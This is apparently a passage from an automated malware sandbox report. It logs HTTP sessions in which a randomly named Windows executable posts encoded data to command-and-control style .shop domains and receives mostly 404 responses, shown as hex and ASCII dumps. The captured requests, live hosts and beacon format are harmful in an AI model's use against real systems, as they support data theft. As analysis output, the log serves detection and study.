                                                                                                                      Data Ascii: 4nJt=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1Mzw0C8IPG7E+cfBKW0VNXNXOgLFaX3tyAbjeKIbvIpLZv6TkEoA9Se65jq/4azYbeaUCjgrv1h/18oLZ/tx0cCYowWDUYfs3NNlz2WXqcF3Jm9R9Ka/yHRFG6eqwadCYb5zjT0HCQ+/dfbzwIRIS+7NJbxX/9WfBqr2v9oFy9zFaGRHnRcp8Xe7SHCoXvkoMeuZ/+QggILbg/wxrQjKj/dWL6yH/9n8uMAKvggcM5cW02tpqB7UVjnasjToNJGQB8jvQFKO3lhbFuc7EdHwW0aMNnpnS4Dc1kUNeA8wKt5cVL4T1R132ArVjEmucB1upieLH2DkP9q+Dyu5dCL+udzQ+oid+xNJSAULWbkY5ohATPq2Da1vWljcO2mH/x57bJMUicOlTWer7b3a61Me2j0IlETQxaJdxAIuLu/H0lwPG2B8SPOyHXtzEeJQguqcc26azazxbzh1/mkowh9/6kriLM0PCj+BYsE8f7Ukpk1U9u4muXJ9UXSUAjsPYqk/34aHlaqlC2IHWBRtMlfH0iv3VserFctZdJ2thrjemzCu6hPA+LQnbyQ5m2AHFPbtd022WbzuW5Ve9nLrFpwkqf5nbTQbgYu50iCN3b0z8Yt9629x0/bISajptBO592BIyq+TDJk8uIB5lPk4KtJezG9HNt4uFd/EeVzZiuyAxRNvUpWh9/BcdRBOjBRZ0aeHzHxZsl8E9n3Ui0x5fO6Ebi/dyQiDexJiCGhk2iilwBhhmnfm58oGw/xYs6p0wi3FSkWE6/7EMobLDFgrQLElVibTJdR2oFoCw9rx+zTku1fyFVEFIts9M/xSXtd5+H5hNB9VtNfSetXEDjfaS+n2xFl7lMT8jJigR7/omU2TT5jk8QIah55ZLYguOVA+4iDd1tC4upTYE8XCQxWAqxkrlo+LWRWBYReohZSwWYyLpde/kNU0ladpYx7C/sGblAhFESsBuaV [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:19:18.182651997 CET925INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=mid2fssla5oqia75p4dmdnq317; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=mid2fssla5oqia75p4dmdnq317; expires=Fri, 24-Nov-2034 10:19:17 GMT; Max-Age=315360000; path=/
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                                      Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.6500178.210.114.150802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:19.237539053 CET363OUTGET /rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.llljjjiii.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:19:20.793379068 CET1120INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Set-Cookie: PHPSESSID=m0kf9igdg5v5rlgnq5e9042i52; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Set-Cookie: sessionid=m0kf9igdg5v5rlgnq5e9042i52; expires=Fri, 24-Nov-2034 10:19:20 GMT; Max-Age=315360000; path=/
                                                                                                                      Data Raw: 32 36 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 32 2e 32 2e 33 2e 6d 69 6e 2e 6a 73 3f 76 3d 22 20 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 61 35 63 33 3b 22 3e 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 27 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c [TRUNCATED]
                                                                                                                      Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.650018172.67.209.48802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:26.303544044 CET621OUTPOST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 36 65 38 69 65 39 53 76 70 54 2b 72 38 6a 6f 6b 73 32 31 35 50 36 31 57 62 67 4e 34 74 54 36 63 7a 63 31 6a 47 52 50 39 6d 61 35 4b 6e 4a 4b 36 64 38 44 51 53 78 51 43 64 57 52 39 68 77 66 5a 63 59 31 39 38 65 4e 75 5a 46 6a 52 52 4f 6c 73 35 62 4a 49 71 2f 41 73 77 49 71 46 6c 65 57 71 4c 34 35 63 56 2b 33 77 51 4e 4f 57 75 33 6b 69 31 63 73 76 6b 59 71 73 4c 53 47 54 64 4e 37 48 59 4f 56 56 58 50 78 72 6f 46 34 66 50 51 79 6c 31 37 46 4f 6e 65 2b 35 43 53 6e 41 4c 36 46 46 58 46 30 46 45 6b 51 55 78 2f 43 36 67 52 76 4e 59 63 51 56 39 67 76 6c 5a 73 4d 73 64 50 6c 4d
                                                                                                                      Data Ascii: 4nJt=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOne+5CSnAL6FFXF0FEkQUx/C6gRvNYcQV9gvlZsMsdPlM
                                                                                                                      Nov 26, 2024 11:19:27.515847921 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:27 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61h0aBsMpLZYAVuIixgC6c2tasiU6xi%2BvgtBLdr6%2B%2BUusJuRQKeXdLuLTrP%2BzkYL165pdaj7bPLj9vQy6NCSU4qWbg94PaboI9o5XhoJwzMHxE2KxPPndSgzni2i2I%2B1JNfN%2FML3lA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8923e769fa41a6-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=6155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=621&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 32 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 93 2e 74 6d fd 03 ba 24 65 85 24 2d 5b ca 28 63 14 59 3a db 0a 8e e4 49 4a 32 2f f1 ff 3e 6c a7 69 56 68 c7 3e 18 24 dd 7b f7 ee 4e cf f2 8f 86 77 83 d9 e3 fd 08 7d 9e 4d c6 e8 fe e1 d3 f8 76 80 da a7 ae 7b 3b 9a dd b8 ee 70 36 6c 22 67 4e d7 75 47 d3 76 d8 f2 53 b3 c8 42 3f 05 c2 c2 96 6f b8 c9 20 ec 77 fb 68 2a 0d ba 91 4b c1 7c b7 39 6c f9 6e 0d f2 23 c9 8a 8a d7 0b 0f 30 69 2f 6c f9 79 38 4b 01 29 f8 b9 04 6d 80 a1 87 2f 63 b4 26 1a 09 69 50 5c e1 90 14 c8 a4 5c 23 0d 6a 05 ca f1 dd bc a6 5d 33 c6 0d 97 82 64 59 d1 41 04 fd 55 40 0b 94 92 aa 4e 04 82 ca a5 30 a0 80 a1 75 ca 33 40 46 15 5c 24 c8 48 b4 d4 80 88 40 a3 0a 3c 94 74 b9 00 61 aa f3 94 08 56 01 5f 2a db c9 6a aa 78 6e 42 2b 5e 0a 5a 89 5b f6 e6 79 89 a8 65 6f 56 44 a1 28 20 0e 95 c2 80 30 cf 39 b7 db fd d1 37 2e 98 5c 3b 6c 17 f1 78 6c 45 0d 8f 05 91 43 15 10 03 a3 0c aa 98 85 1b 39 6c 7b cc e1 42 80 aa ee 21 68 af 9b 14 4f 4f 83 9b 63 ba 3a ce [TRUNCATED]
                                                                                                                      Data Ascii: 2a9Tk0B!.tm$e$-[(cY:IJ2/>liVh>${Nw}Mv{;p6l"gNuGvSB?o wh*K|9ln#0i/ly8K)m/c&iP\\#j]3dYAU@N0u3@F\$H@<taV_*jxnB+^Z[yeoVD( 097.\;lxlEC9l{B!hOOc:"l2&9s'3{25OE=^W_K%s-oGHA!#V4.e&)21Tiw \8
                                                                                                                      Nov 26, 2024 11:19:27.516012907 CET276INData Raw: 73 8d bd bd 46 02 66 27 a0 3f 15 33 92 4c c9 02 2c 5c b9 04 db df bb 3f 1c 92 e7 20 d8 20 e5 19 b3 88 ed b5 bd e8 bf 28 cc 2e 4b 1e 5b 7b b9 ca 78 cd 78 df ee 93 c7 8a 2c a0 ee 33 05 9e a4 26 e8 79 c4 59 73 66 d2 7a a5 4d 91 81 93 4b 5d fb 2d c0
                                                                                                                      Data Ascii: sFf'?3L,\? (.K[{xx,3&yYsfzMK]-$2[y26G<pq03I>^Q@X6l2$sm@&cI0Mz~")E-+Qv{G;`XtmeY;[?9


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.650019172.67.209.48802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:29.009712934 CET645OUTPOST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 69 63 79 39 46 6a 48 54 72 39 32 4b 35 4b 79 35 4b 37 54 63 44 62 53 78 63 38 64 58 39 39 68 77 4c 5a 63 64 4a 39 37 76 4e 70 59 56 6a 54 64 75 6c 75 6b 4c 4a 49 71 2f 41 73 77 49 75 72 6c 65 4f 71 4c 4c 78 63 57 66 33 7a 54 4e 4f 56 70 33 6b 69 2f 38 73 72 6b 59 71 43 4c 54 62 38 64 4f 44 48 59 4f 6c 56 58 62 74 73 6a 46 34 6a 4c 51 7a 41 77 34 73 58 68 74 79 2f 42 56 66 48 59 74 35 35 62 54 70 66 59 58 51 33 6a 76 69 34 67 54 33 2f 59 38 51 2f 2f 67 58 6c 4c 37 41 4c 53 37 41 76 39 43 48 42 45 79 51 39 7a 75 57 4c 58 2f 68 61 7a 35 75 64 75 41 3d 3d
                                                                                                                      Data Ascii: 4nJt=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvi4gT3/Y8Q//gXlL7ALS7Av9CHBEyQ9zuWLX/haz5uduA==
                                                                                                                      Nov 26, 2024 11:19:30.261264086 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:30 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNEGVMKrSuD3fie%2FWG29BZDGVkstMMYqum5eXlzYxUazZO6cIEmE6wtQExqAoOsxJ1%2B068vXVKQ4bj6vH5hMbf6Z29ozvIFtZj%2Bc0Umm00BC%2BZsu7vZDqv%2B0D%2Bq%2BfCjdLW2OOVi3FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e8923f88ce5c35b-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1463&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=645&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 6b 6b db 30 14 fd 9e 5f a1 86 52 c9 90 da e9 0b b2 fa 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 5d db 2a 8e e4 49 4a b2 2c f1 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee 39 f7 dc 7b 75 ac e0 60 70 d7 9f 3e de 0f d1 e7 e9 78 84 ee 1f ae 47 b7 7d d4 3e f6 bc db e1 f4 c6 f3 06 d3 41 13 39 75 bb 9e 37 9c b4 a3 56 90 d9 59 1e 05 19 50 1e b5 02 2b 6c 0e d1 79 f7 1c 4d 94 45 37 6a 2e 79 e0 35 87 ad c0 ab 41 41 ac f8 aa e2 9d 44 7b 98 ec 24 6a 05 45 34 cd 00 69 f8 39 07 63 81 a3 87 2f 23 b4 a4 06 49 65 51 52 e1 90 92 c8 66 c2 20 03 7a 01 da 0d bc a2 a6 5d 71 2e ac 50 92 e6 f9 aa 83 28 fa ab 80 16 68 ad 74 9d 08 24 53 73 69 41 03 47 cb 4c e4 80 ac 5e 09 99 22 ab d0 dc 00 a2 12 0d 2b f0 40 b1 f9 0c a4 ad ce 33 2a 79 05 7c ad 6c 2b 6b 98 16 85 8d 48 32 97 ac 12 27 ce fa 65 89 18 71 d6 0b aa 51 1c 52 97 29 69 41 da 97 9c 9b cd ee e8 9b 90 5c 2d 5d be 8d f8 22 21 71 c3 e3 61 ec 32 0d d4 c2 30 87 2a 46 70 23 87 1d 9f bb 42 4a d0 d5 3d 84 ed 65 93 e2 e9 a9 7f 73 c8 16 87 05 [TRUNCATED]
                                                                                                                      Data Ascii: 2b3Tkk0_RmB-e1,]*IJ,4+c9{u`p>xG}>A9u7VYP+lyME7j.y5AAD{$jE4i9c/#IeQRf z]q.P(ht$SsiAGL^"+@3*y|l+kH2'eqQR)iA\-]"!qa20*Fp#BJ=estf=}:=Kz="{S{k<>U+Y:uB}B1.Y*<<qS(=fT
                                                                                                                      Nov 26, 2024 11:19:30.261507034 CET272INData Raw: 48 f7 d9 60 7f a7 91 82 dd 0a 98 eb d5 94 a6 13 3a 03 82 2b 97 60 e7 7b f7 87 4b 8b 02 24 ef 67 22 e7 84 3a 7e db 8f ff 8b c2 9d b2 14 09 d9 c9 55 c6 6b c6 fb 7e 9f 22 d1 74 06 75 9f 19 88 34 b3 e1 89 4f dd a5 e0 36 ab 57 c6 ae 72 70 0b 65 6a bf
                                                                                                                      Data Ascii: H`:+`{K$g":~Uk~"tu4O6WrpejFsx]Js!JQXBA$DBp(2k3(_}CnlMB9.@0$hg{!xp77&)kWI%kQS6??@;`GeY:


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.650020172.67.209.48802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:19:31.674840927 CET1658OUTPOST /huvt/ HTTP/1.1
                                                                                                                      Host: www.ampsamkok88.shop
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.ampsamkok88.shop
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 52 35 5a 53 55 2b 4b 7a 59 47 69 2f 32 6c 67 68 6a 68 56 39 77 61 34 7a 4c 70 50 4b 30 39 61 5a 4d 4d 35 30 36 5a 45 7a 56 70 6b 64 43 6d 63 72 38 45 33 35 76 6a 30 50 33 52 53 34 64 46 6b 46 63 48 4a 31 56 69 46 54 4a 4d 32 6a 36 69 33 71 34 61 68 31 36 73 78 69 2f 63 62 59 35 30 37 47 63 70 43 51 77 35 4a 45 4a 55 64 4a 47 4b 45 61 64 63 6e 42 30 6e 36 4b 46 4b 72 7a 74 66 56 59 65 2b 68 4a 79 4b 56 79 63 50 46 76 58 44 36 62 44 58 55 74 47 33 2b 35 62 36 55 68 4d 6e 79 55 58 62 6d [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqR5ZSU+KzYGi/2lghjhV9wa4zLpPK09aZMM506ZEzVpkdCmcr8E35vj0P3RS4dFkFcHJ1ViFTJM2j6i3q4ah16sxi/cbY507GcpCQw5JEJUdJGKEadcnB0n6KFKrztfVYe+hJyKVycPFvXD6bDXUtG3+5b6UhMnyUXbmmPuxkvkWaZaCcs3rheiqmqMGlZR2jkFJMkGDwS3ggwnZitemZCJ54AI6+v8jBm8BxTkI4tqBPJ9NFhyDfFdK89/K2BWmgE2ySrRA6p8jdyn8lOfLC0MYjbi2I1BSYNNt4r5Q2k/0Qy0RPp8/4KQ3rSJP9d60m2T6OvRlEOfll9mEM/0sR/55r4Lr8DkaxAAR5KXeLaB+ReblRTvD/xlPscFtYAVwvyNys1fV8qRjthgyoRdp8XPvKYMHdVGUEkTZxDKqdLf/+3s9RkZk1lcWEoseDMExGym0533j9BENoqv63DUUanQiVgtVkysshuxf0VhTbcScntKX9F+hY0yEperCpRrd2maZlhlVkI5HmsYoEQUVjvnTST0UXZF/UiEJc9T3jtmiqLONPH6u4ji1GwatHdJVk1Gdys0srp7rJ4U7XcQggnpkKEQlhJ/k6rIacsMXs9fIbieNEnYGeXiZPZyFlpaiU/u0/b4aia7AGhMn7cCpjkqLLrs9o4MlYqbXCp9UfXztzxVK3eHs50d1dn6hu+m7YTR9STBMvwUHxwX7dj3MQ5WHZQhpf/v/u/73Aq1/FFfsmkeEI1mXS//804hPd3J/0Z71LxTcSZfSCvG4sVfPwi4XItx7HJ1eAaLwLaQ53xTLh1ktQHemS8/D/R4AJfgJDLSbvG [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:19:32.899388075 CET1236INHTTP/1.1 404 Not Found
                                                                                                                      Date: Tue, 26 Nov 2024 10:19:32 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bNR13V4sLxlgAsW4Ga94sQ9gboILyfdeBIavtEmj3d7iZAdtW6u%2Fiay6xavXVPQ4csbmA6VHFXSPBnrqACkHL6yJR7VvJwMIWNiwYz4Pe7hz6psM1gi%2FjNtDJ9rLOVm3dNqWhf%2FstA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e892408f95f8cc0-EWR
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1897&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1658&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 b2 21 b5 d3 2e 83 b6 fe 01 6d 92 b2 42 92 96 2d 65 94 31 8a 2c 9d 6d 05 45 f2 24 25 59 96 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 85 1f 06 77 fd e9 e3 fd 10 7d 9e 8e 47 e8 fe e1 7a 74 db 47 ed 13 df bf 1d 4e 6f 7c 7f 30 1d 34 91 33 af eb fb c3 49 3b 6e 85 b9 9d 8b 38 cc 81 b0 b8 15 5a 6e 05 c4 bd 6e 0f 4d 94 45 37 6a 21 59 e8 37 87 ad d0 af 41 61 a2 d8 ba e2 9d c6 07 98 fc 34 6e 85 45 3c cd 01 69 f8 b9 00 63 81 a1 87 2f 23 b4 22 06 49 65 51 5a e1 90 92 c8 e6 dc 20 03 7a 09 da 0b fd a2 a6 5d 31 c6 2d 57 92 08 b1 ee 20 82 fe 2a a0 05 5a 2b 5d 27 02 49 d5 42 5a d0 c0 d0 2a e7 02 90 d5 6b 2e 33 64 15 5a 18 40 44 a2 61 05 1e 28 ba 98 83 b4 d5 79 4e 24 ab 80 2f 95 ed 64 0d d5 bc b0 b1 93 2e 24 ad c4 1d 77 f3 bc 44 d4 71 37 4b a2 51 12 11 8f 2a 69 41 da e7 9c db ed fe e8 1b 97 4c ad 3c b6 8b 04 3c 75 92 86 c7 a2 c4 a3 1a 88 85 a1 80 2a e6 e0 46 0e bb 01 f3 b8 94 a0 ab 7b 88 da ab 26 c5 d3 53 ff e6 88 2e 8f 0a [TRUNCATED]
                                                                                                                      Data Ascii: 2b3Tk0B!.mB-e1,mE$%Y4+c{wgw}GztGNo|043I;n8ZnnME7j!Y7Aa4nE<ic/#"IeQZ z]1-W *Z+]'IBZ*k.3dZ@Da(yN$/d.$wDq7KQ*iAL<<u*F{&S.D}=O/>vq^Mfc[W2dI\JR0g4O<iNI!M3952
